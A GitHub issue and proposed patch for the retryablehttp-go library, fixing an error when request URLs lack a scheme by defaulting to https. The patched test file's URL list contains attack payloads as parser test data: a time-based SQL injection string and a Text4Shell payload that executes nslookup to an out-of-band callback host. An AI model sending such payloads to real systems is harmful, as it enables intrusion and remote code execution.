unsupported protocol scheme error with NewRequest

<!-- 
1. Please search to see if an issue already exists for the bug you encountered.
2. For support requests, FAQs or "How to" questions, please use the GitHub Discussions section instead - https://github.com/projectdiscovery/retryablehttp/discussions or
3. Join our discord server at https://discord.gg/projectdiscovery and post the question on the #retryablehttp channel.
-->

<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->

### retryablehttp version:
<!-- You can find current version of retryablehttp with "retryablehttp -version" -->
<!-- We only accept issues that are reproducible on the latest version of retryablehttp. -->
<!-- You can find the latest version of project at https://github.com/projectdiscovery/retryablehttp/releases/ -->
dev | main

### Current Behavior:
<!-- A concise description of what you're experiencing. -->
when url does not contain scheme . requests created using `retryablehttp-go` throw unsupported protocol scheme error


### Expected Behavior:
<!-- A concise description of what you expected to happen. -->
no error and this condition should be auto handled

### Steps To Reproduce:
<!--
Example: steps to reproduce the behavior:
1. Run 'retryablehttp ..'
2. See error...
-->
```go
	package main

import (
	"github.com/projectdiscovery/retryablehttp-go"
)

func main() {
	req, err := retryablehttp.DefaultClient().Get("scanme.sh/path")
	if err != nil {
		panic(err)
	}
	_ = req
}
```
```console
$ go run . 
panic: Get "scanme.sh/path": unsupported protocol scheme ""

goroutine 1 [running]:
main.main()
        /Users/tarun/testing/tmout/main.go:10 +0x1e0
exit status 2
```


### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->

--- a/request.go
+++ b/request.go
@@ -7,11 +7,15 @@ import (
 	"net/http"
 	"net/http/httptrace"
 	"net/http/httputil"
+	"net/url"
 	"os"
 
 	readerutil "github.com/projectdiscovery/utils/reader"
 	urlutil "github.com/projectdiscovery/utils/url"
 )
+
+// When True . Request uses `http` as scheme instead of `https`
+var PreferHTTP bool
 
 // Request wraps the metadata needed to create HTTP requests.
 // Request is not threadsafe. A request cannot be used by multiple goroutines
@@ -100,6 +104,14 @@ func (r *Request) BodyBytes() ([]byte, error) {
 // Update request URL with new changes of parameters if any
 func (r *Request) Update() {
 	r.URL.Update()
+	updateScheme(r.URL.URL)
+}
+
+// SetURL updates request url (i.e http.Request.URL) with given url
+func (r *Request) SetURL(u *urlutil.URL) {
+	r.URL = u
+	r.Request.URL = u.URL
+	r.Update()
 }
 
 // Clones and returns new Request
@@ -218,6 +230,7 @@ func NewRequest(method, url string, body interface{}) (*Request, error) {
 		return nil, err
 	}
 	httpReq.URL = urlx.URL
+	updateScheme(httpReq.URL)
 
 	// content-length and body should be assigned only
 	// if request has body
@@ -245,6 +258,7 @@ func NewRequestWithContext(ctx context.Context, method, url string, body interfa
 		return nil, err
 	}
 	httpReq.URL = urlx.URL
+	updateScheme(httpReq.URL)
 	// content-length and body should be assigned only
 	// if request has body
 	if bodyReader != nil {
@@ -253,4 +267,21 @@ func NewRequestWithContext(ctx context.Context, method, url string, body interfa
 	}
 
 	return &Request{httpReq, urlx, Metrics{}, nil}, nil
+}
+
+func updateScheme(u *url.URL) {
+	// when url without scheme is passed to url.URL it loosely parses and ususally actual host is either part of scheme or path
+	// But this is sometimes handled internally when creating request using http.NewRequest
+	// Also It is illegal to update http.Request.URL in serverHTTP https://github.com/golang/go/issues/18952 but no mention about client side
+
+	// When Url of Request is updated (i.e http.Request.URL = tmp etc) this condition must be explicitly handled else
+	// it causes `unsupported protocol scheme "" error `
+
+	if u.Host != "" && u.Scheme == "" {
+		if PreferHTTP {
+			u.Scheme = "http"
+		} else {
+			u.Scheme = "https"
+		}
+	}
 }

--- a/request_test.go
+++ b/request_test.go
@@ -12,6 +12,10 @@ func TestRequestUrls(t *testing.T) {
 		"https://scanme.sh?exploit=1+AND+(SELECT+*+FROM+(SELECT(SLEEP(12)))nQIP)",
 		"https://scanme.sh/%20test%0a",
 		"https://scanme.sh/text4shell/attack?search=$%7bscript:javascript:java.lang.Runtime.getRuntime().exec('nslookup%20{{Host}}.{{Port}}.getparam.{{interactsh-url}}')%7d",
+		"scanme.sh",
+		"scanme.sh/with/path",
+		"scanme.sh:443",
+		"scanme.sh:443/with/path",
 	}
 
 	debug := os.Getenv("DEBUG")

